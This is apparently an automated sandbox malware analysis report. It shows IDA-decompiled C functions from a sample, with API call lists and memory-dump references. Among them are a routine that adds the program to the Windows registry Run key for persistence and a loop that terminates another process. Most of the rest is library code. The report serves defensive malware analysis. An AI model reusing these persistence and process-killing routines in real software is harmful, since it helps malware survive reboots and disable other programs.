    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}












    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep("h N");
    				goto L2;
    			}











    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep("h N");
    				}
    			}










    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}






    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
    										__eax = E00408974(__ebp);
    										__eflags =  *(__ebp - 0xc) - 1;
    										if( *(__ebp - 0xc) != 1) {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										} else {
    											__eax =  *(__ebp + 8);
    											__eax =  *0x454698; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										}
    										goto L109;
    									case 0xa:
    										L70:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 3;
    										if( *(__ebp - 0xc) > 3) {
    											 *(__ebp - 0xc) = 3;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 0xb:
    										goto L0;
    									case 0xc:
    										L90:
    										E00408974(__ebp) =  *(__ebp + 8);
    										__eax =  *0x454684; // 0x0
    										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    										__eax = E004089D8(__ebp);
    										__eflags =  *((short*)(__ebp - 0x16));
    										if( *((short*)(__ebp - 0x16)) != 0) {
    											L93:
    											 *(__ebp + 8) = 0x409438;
    											__edx = 1;
    											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
    											__eax =  *0x45469c; // 0x0
    											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    											goto L109;
    										}
    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}


















    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}




















    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}










    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
